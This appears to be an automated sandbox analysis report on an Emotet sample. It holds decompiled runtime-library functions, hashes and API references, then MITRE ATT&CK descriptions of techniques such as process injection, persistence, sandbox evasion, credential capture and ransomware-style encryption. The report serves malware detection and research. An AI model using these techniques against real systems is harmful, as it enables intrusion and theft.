Instruction ID: 0881663991a763b1776dc7e615562ac6718b0cdd44e68c2937c70cca8b3e00b0
Opcode Fuzzy Hash: f03796f0994221b19e597dc6b348fa6f620dcfc84c8546b3792d48647d6ad245
Instruction Fuzzy Hash: 37F0C272700255AFCB14DB45DC41BAEF7B8EB84344F40403FF501A7281C7B86908C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E516, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040E516(intOrPtr __ecx, void* __eflags) {
				void* _t30;

				E00406520(E0042AE28, _t30);
				_push(__ecx);
				_push(__ecx);
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				 *((intOrPtr*)(_t30 - 0x10)) = 0x42e428;
				E0040F44C(__ecx, __eflags, _t30 - 0x10);
				 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
				 *((char*)(__ecx + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t30 + 8))));
				E00401AE0(__ecx + 0xc, 0);
				E00402320(__ecx + 0xc,  *((intOrPtr*)(_t30 + 8)), 0,  *0x42b7d8);
				 *((intOrPtr*)(__ecx)) = 0x42f908;
				 *[fs:0x0] =  *((intOrPtr*)(_t30 - 0xc));
				return __ecx;
			}

0x0040e51b
0x0040e520
0x0040e521
0x0040e52b
0x0040e52e
0x0040e535
0x0040e53d
0x0040e54a
0x0040e54c
0x0040e55c
0x0040e564
0x0040e56f
0x0040e577

APIs

__EH_prolog.LIBCMT ref: 0040E51B

Strings

(B, xrefs: 0040E52E
ios::failbit set, xrefs: 0040E523

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prolog
String ID: (B$ios::failbit set
API String ID: 3519838083-3284000329
Opcode ID: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction ID: 4fe0a7923be2234898ba92f5c38d2ffc42e0a3632a550d53740f74c2571e9ed9
Opcode Fuzzy Hash: 714bb1d5edfaf863b24652250af2c782f2a8feea1520e9748f6d812b5ca07bc2
Instruction Fuzzy Hash: 51F06272701215AFD7149B55D841BAEBBB8EB85744F40443FF511B7281C7B8690887A9

Uniqueness

Uniqueness Score: -1.00%

Function 00404EAA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00404EAA(char _a4, signed int _a8) {
				intOrPtr* _t18;

				if(E00404DD2() == 0) {
					if((_a8 & 0x00000003) != 0) {
						L8:
						return 0x12340042;
					}
					_t6 =  &_a4; // 0x404f63
					_t18 =  *_t6;
					if( *((intOrPtr*)(_t18 + 8)) <= 0 ||  *((intOrPtr*)(_t18 + 0xc)) <= 0 ||  *_t18 >= GetSystemMetrics(0) ||  *((intOrPtr*)(_t18 + 4)) >= GetSystemMetrics(1)) {
						return 0;
					} else {
						goto L8;
					}
				}
				return  *0x439610(_a4, _a8);
			}

0x00404eb3
0x00404eca
0x00404ef6
0x00000000
0x00404ef6
0x00404ecc
0x00404ecc
0x00404ed5
0x00000000
0x00000000
0x00000000
0x00000000
0x00404ed5
0x00000000

APIs

GetSystemMetrics.USER32 ref: 00404EE3
GetSystemMetrics.USER32 ref: 00404EEB

Strings

cO@, xrefs: 00404ECC

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MetricsSystem
String ID: cO@
API String ID: 4116985748-3035479601
Opcode ID: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction ID: ce698e49c9a3c3113b24397bbaff0b3bfb960c4a55519e17048666b9bd17cfe1
Opcode Fuzzy Hash: c9c4155c18cf154a998879a47653fee1527eb16e544136ed5b28fe4e123089dd
Instruction Fuzzy Hash: 6AF03071104352DBC7219A35D804527B7D0BBC4355F008C7EE795A65D1D738D882EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040E073, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E0040E073(void* __eflags) {
				intOrPtr* _t42;
				intOrPtr* _t52;
				void* _t54;
				signed int _t60;

				E00406520(E0042AD88, _t54);
				 *((char*)(_t54 - 0x20)) =  *((intOrPtr*)(_t54 - 0xd));
				E00401AE0(_t54 - 0x20, 0);
				E00401B90(_t54 - 0x20, "string too long", E00405A40("string too long"));
				_t5 = _t54 - 4;
				 *_t5 =  *(_t54 - 4) & 0x00000000;
				_t60 =  *_t5;
				_push(_t54 - 0x20);
				_t42 = _t54 - 0x3c;
				L1();
				 *((intOrPtr*)(_t54 - 0x3c)) = 0x42f864;
				E004067EC(_t54 - 0x3c, 0x4336b8);
				_pop(_t51);
				E00406520(E0042AD9C, _t54);
				_push(_t42);
				_push(_t42);
				_t52 = _t42;
				 *((intOrPtr*)(_t54 - 0x14)) = _t52;
				 *((intOrPtr*)(_t54 - 0x10)) = 0x42e428;
				E0040F44C(_t42, _t60, _t54 - 0x10);
				 *(_t54 - 4) =  *(_t54 - 4) & 0x00000000;
				 *((char*)(_t52 + 0xc)) =  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8))));
				E00401AE0(_t52 + 0xc, 0);
				E00402320(_t52 + 0xc,  *((intOrPtr*)(_t54 + 8)), 0,  *0x42b7d8);
				 *_t52 = 0x42f884;
				 *[fs:0x0] =  *((intOrPtr*)(_t54 - 0xc));
				return _t52;
			}

APIs

__EH_prolog.LIBCMT ref: 0040E078

Part of subcall function 0040E0CD: __EH_prolog.LIBCMT ref: 0040E0D2

Part of subcall function 004067EC: RaiseException.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00406468,00000000), ref: 0040681A

Strings

string too long, xrefs: 0040E091, 0040E096, 0040E09E
ios::failbit set, xrefs: 0040E083

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prolog$ExceptionRaise
String ID: ios::failbit set$string too long
API String ID: 2062786585-1331328489
Opcode ID: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction ID: 323c5a97231c9e7e2180db571d543564ba768becdaa7b618deba2c25bb2dd9de
Opcode Fuzzy Hash: bbf4af397965b2b2160e068da4858f3148205e3645e3424e421b924f25707da3
Instruction Fuzzy Hash: 68F03A62D111286ACB04F6E6EC42AEEBB7CAF08345F40407AF411B6092DB785608CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00425BA0, Relevance: 5.1, APIs: 4, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00425BA0(long* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				void* _t29;
				intOrPtr _t32;
				long* _t37;
				intOrPtr* _t42;
				signed int _t45;
				struct _CRITICAL_SECTION* _t46;
				intOrPtr* _t49;

				_push(__ecx);
				_t49 = _a4;
				_t37 = __ecx;
				_t45 = 1;
				_v8 = _t45;
				if( *((intOrPtr*)(_t49 + 8)) <= _t45) {
					L10:
					_t46 =  &(_t37[7]);
					EnterCriticalSection(_t46);
					E0042581A( &(_t37[5]), _t49);
					LeaveCriticalSection(_t46);
					LocalFree( *(_t49 + 0xc));
					if(_t49 != 0) {
						 *((intOrPtr*)( *_t49))(1);
					}
					_t29 = TlsSetValue( *_t37, 0);
					L13:
					return _t29;
				} else {
					goto L1;
				}
				do {
					L1:
					_t32 = _a8;
					if(_t32 == 0 ||  *((intOrPtr*)(_t37[4] + 4 + _t45 * 8)) == _t32) {
						_t42 =  *((intOrPtr*)( *(_t49 + 0xc) + _t45 * 4));
						if(_t42 != 0) {
							 *((intOrPtr*)( *_t42))(1);
						}
						_t29 =  *(_t49 + 0xc);
						 *(_t29 + _t45 * 4) =  *(_t29 + _t45 * 4) & 0x00000000;
					} else {
						_t29 =  *(_t49 + 0xc);
						if( *(_t29 + _t45 * 4) != 0) {
							_v8 = _v8 & 0x00000000;
						}
					}
					_t45 = _t45 + 1;
				} while (_t45 <  *((intOrPtr*)(_t49 + 8)));
				if(_v8 == 0) {
					goto L13;
				}
				goto L10;
			}

APIs

EnterCriticalSection.KERNEL32(?), ref: 00425BFD
LeaveCriticalSection.KERNEL32(?,?), ref: 00425C0D
LocalFree.KERNEL32(?), ref: 00425C16
TlsSetValue.KERNEL32(?,00000000), ref: 00425C2C

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction ID: 2aca870bf4ceec97ac406f80c089e65d4ca4c841141b20e4fc51915e0dfd648f
Opcode Fuzzy Hash: cf5b2c567d48c01c7a453ca9de575100b85300225b99a98f7f9799342d216000
Instruction Fuzzy Hash: BA21AC31305724EFC7249F45E888B6A7BA4FF40712F9080AEE5428B2A1D7B8F841CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00425F56, Relevance: 5.0, APIs: 4, Instructions: 36
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00425F56(signed int _a4) {
				void* _t14;
				struct _CRITICAL_SECTION* _t16;
				signed int _t22;
				intOrPtr* _t25;
				intOrPtr _t30;
				intOrPtr _t31;

				_t30 =  *0x439bdc; // 0x1
				if(_t30 == 0) {
					_t14 = E00425EC3();
				}
				_t31 =  *0x439bd8; // 0x0
				if(_t31 == 0) {
					_t22 = _a4;
					_t25 = 0x4399e0 + _t22 * 4;
					if( *((intOrPtr*)(0x4399e0 + _t22 * 4)) == 0) {
						EnterCriticalSection(0x439a28);
						if( *_t25 == 0) {
							InitializeCriticalSection(0x439a40 + (_t22 + _t22 * 2) * 8);
							 *_t25 =  *_t25 + 1;
						}
						LeaveCriticalSection(0x439a28);
					}
					_t16 = 0x439a40 + (_t22 + _t22 * 2) * 8;
					EnterCriticalSection(_t16);
					return _t16;
				}
				return _t14;
			}

APIs

EnterCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425F91
InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FA3
LeaveCriticalSection.KERNEL32(00439A28,?,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26), ref: 00425FAC
EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700), ref: 00425FBE

Part of subcall function 00425EC3: GetVersion.KERNEL32(?,00425F66,?,00425D48,00000010,?,00000000,?,?,?,00424C20,00424C6D,0042440D,00424C26,00412700,0041843C), ref: 00425ED6

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalSection$Enter$InitializeLeaveVersion
String ID:
API String ID: 1193629340-0
Opcode ID: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction ID: b3ac33658b3b741abd4bb59a3792cd3dace0394c803b1a2d8ae3ffca9e92013f
Opcode Fuzzy Hash: 8ad6497125d2c86d00cbfb5de7a409f9b0d7499c984595d8118e55b052ad55c4
Instruction Fuzzy Hash: 00F0497160472ADFCB20EF64FC84997B3ACFB18316B81203BE64582161D774B956DBAC

Uniqueness

Uniqueness Score: -1.00%

Function 004079AB, Relevance: 5.0, APIs: 4, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004079AB(void* __eax) {
				void* _t1;

				_t1 = __eax;
				InitializeCriticalSection( *0x436f2c);
				InitializeCriticalSection( *0x436f1c);
				InitializeCriticalSection( *0x436f0c);
				InitializeCriticalSection( *0x436eec);
				return _t1;
			}

0x004079ab
0x004079b8
0x004079c0
0x004079c8
0x004079d0
0x004079d3

APIs

InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079B8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C0
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079C8
InitializeCriticalSection.KERNEL32(?,00408DF2,?,004063F8), ref: 004079D0

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: CriticalInitializeSection
String ID:
API String ID: 32694325-0
Opcode ID: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction ID: 7b146446db7a68f273d69e9c37099d6d57513ee84f4d93e1aa445e082747f6c1
Opcode Fuzzy Hash: 51e235add1c7942b8d8dfe3c36194d8a20d458bafa86fc8f5d4db9dc8472a5e3
Instruction Fuzzy Hash: 67C00235905135FADF516B75FC058493F25EB063A0312E172E5145103487631C15EFD8

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist , and "net start" using Net , but adversaries may also use other tools as well. Adversaries may use the information from System Service Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 2ojdmC51As.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: Emotet

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Cryptography:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

Spam, unwanted Advertisements and Ransom Demands:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

Function 004013A4, Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 288
libraryloaderCOMMON

Function 022338F0, Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 189
fileCOMMON

Function 02235070, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 205
serviceCOMMON

Function 00425FF1, Relevance: 6.1, APIs: 4, Instructions: 63
COMMON

Function 02238240, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 183
fileCOMMONCrypto

Function 022342F0, Relevance: 1.5, APIs: 1, Instructions: 30
memoryCOMMON

Function 00409C36, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 0042592B, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99
memoryCOMMONLIBRARYCODE

Function 02237EC0, Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 227
fileCOMMON

Function 004171BC, Relevance: 9.0, APIs: 6, Instructions: 35
COMMON

Function 022330D0, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 150
memoryCOMMON

Function 004080E7, Relevance: 6.1, APIs: 4, Instructions: 53
memoryCOMMONLIBRARYCODE

Function 02234BA0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 87
processCOMMON

Function 00426474, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
COMMON

Function 022396B0, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 191
COMMON

Function 022336B0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
fileCOMMON

Function 00412710, Relevance: 3.0, APIs: 2, Instructions: 27
threadCOMMON

Function 0040796F, Relevance: 3.0, APIs: 2, Instructions: 20
memoryCOMMON

Function 02235CA0, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Function 02236FB0, Relevance: 1.6, APIs: 1, Instructions: 107
libraryCOMMON

Function 02236F10, Relevance: 1.5, APIs: 1, Instructions: 45
libraryCOMMON

Function 00408198, Relevance: 1.3, APIs: 1, Instructions: 85
memoryCOMMONLIBRARYCODE

Function 00407333, Relevance: 1.3, APIs: 1, Instructions: 56
memoryCOMMONLIBRARYCODE

Function 00410E05, Relevance: 37.1, APIs: 18, Strings: 3, Instructions: 343
windowkeyboardCOMMON

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.
Tactics:	Impact
Data Sources:	File monitoring, Kernel drivers, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre